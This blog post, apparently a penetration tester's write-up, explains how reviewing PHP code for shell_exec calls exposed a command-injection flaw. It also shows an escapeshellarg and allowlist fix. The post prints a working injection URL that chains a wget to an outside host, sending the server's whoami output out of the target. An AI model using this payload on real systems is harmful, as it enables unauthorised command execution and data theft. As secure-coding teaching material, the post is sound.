Code review to simple RCE

Jess
2 min read · Jun 9, 2022

A code-review penetration test of an old PHP application revealed a simple RCE.

Start with a search for sensitive functions being called, in this case “shell_exec”.
This is the PHP function that hands a string to the system shell (/bin/sh -c) and returns the output.
Wherever it appears in code, it should be a focus point: if any part of that string comes from the user, the user can add shell syntax to it.

<?php
header("Content-Type: application/json");
if( isset($_GET["query"]) ){
    $query = $_GET["query"];
    if( isset($_GET["customer"]) ) {
        $customer = $_GET["customer"];
    } else {
        $customer = "default";
    }
    // Both user-controlled strings are concatenated, unquoted, straight into the shell command line
    $result=shell_exec("/Admin/exeQuery.sh ".$query." ".$customer);
    echo $result;
}
?>

Obviously $customer is our easiest attack vector: it is the last string in the command, so whatever we append after it runs as-is with nothing trailing to break. Note that $query is injected unquoted as well, so it would work just as well; a trailing parameter is simply more convenient.

Time to test!

I started with a wget to see if I could get the target to reach my own server:

notsafe.com/getData.php?query=asdf&customer=;wget%20https://mysite.io/listen.php%3Fc=`whoami`

With the %20 decoded back to a space, PHP hands the shell this command line:

/Admin/exeQuery.sh asdf ;wget https://mysite.io/listen.php?c=`whoami`

The shell runs exeQuery.sh with its arguments, and then, because of the “;”, runs wget as a second command. The request that arrives at mysite.io carries the username the web server is running as.

If you are new to shell commands, note the backticks around “whoami”.
This is command substitution: the shell runs the enclosed command and splices its output into the surrounding string before the outer command (here wget) is executed. $(whoami) is the equivalent modern form.

You can read more about it in the POSIX shell specification:
https://pubs.opengroup.org/onlinepubs/9699919799/utilities/V3_chap02.html#tag_18_06_03
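To put the review finding and the payload side by side, here is an added example (not code from the original post): the same concatenation as the reviewed handler, followed by a hardened version that allowlists customer and passes every argument through escapeshellarg(). The /Admin/exeQuery.sh path and the query/customer parameters come from the code above; the allowlist values and the mysite.io callback are assumptions for illustration.

```php
<?php
// Added example, not code from the original post. The script path and the
// parameter names come from the reviewed handler; the allowlist values and
// the mysite.io callback are assumptions for illustration.
declare(strict_types=1);

// Vulnerable: identical concatenation to the reviewed code. Both strings are
// interpolated unquoted, so /bin/sh treats ';', '|', '&&', '$(...)' and
// backticks inside them as syntax rather than data.
function buildCommandVulnerable(string $query, string $customer): string
{
    return "/Admin/exeQuery.sh " . $query . " " . $customer;
}

// Hardened: customer must be one of a fixed set of values, and every argument
// is wrapped by escapeshellarg(), which single-quotes it and escapes any
// embedded single quote. The shell then sees exactly three words, whatever
// the input contained.
function buildCommandHardened(string $query, string $customer): ?string
{
    $allowedCustomers = ['default', 'acme', 'globex']; // hypothetical allowlist
    if (!in_array($customer, $allowedCustomers, true)) {
        return null; // reject; do not silently fall back to "default"
    }
    return "/Admin/exeQuery.sh " . escapeshellarg($query) . " " . escapeshellarg($customer);
}

// Payload from the write-up: terminate exeQuery.sh with ';' and append a wget
// whose URL carries the output of `whoami`, substituted by the target's shell.
$payload = ';wget https://mysite.io/listen.php?c=`whoami`';

echo "vulnerable: " . buildCommandVulnerable('asdf', $payload) . "\n";
echo "hardened:   " . var_export(buildCommandHardened('asdf', $payload), true) . "\n";
echo "hardened:   " . buildCommandHardened("it's; a test", 'acme') . "\n";

// Self-checks so the example fails loudly if the hardening regresses.
if (buildCommandHardened('asdf', $payload) !== null) {
    throw new RuntimeException('allowlist did not reject the injected customer value');
}
// escapeshellarg() quoting differs on Windows, so only check the Unix form there.
if (PHP_OS_FAMILY !== 'Windows'
    && buildCommandHardened("it's; a test", 'acme') !== "/Admin/exeQuery.sh 'it'\\''s; a test' 'acme'") {
    throw new RuntimeException('escapeshellarg quoting differs from expectation');
}
```

Run it with the php CLI. The vulnerable line prints the injected command exactly as the shell would receive it; the hardened version returns NULL for the payload (customer is not on the allowlist) and, for a tricky but legitimate query, a command line in which the “;” and the quote are inert inside a single-quoted word. escapeshellarg() is the minimum fix for an existing shell_exec() call; the better design is to avoid the shell entirely, for example by calling proc_open() with an array command (PHP 7.4 and later), which executes the program directly with the given argument list.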
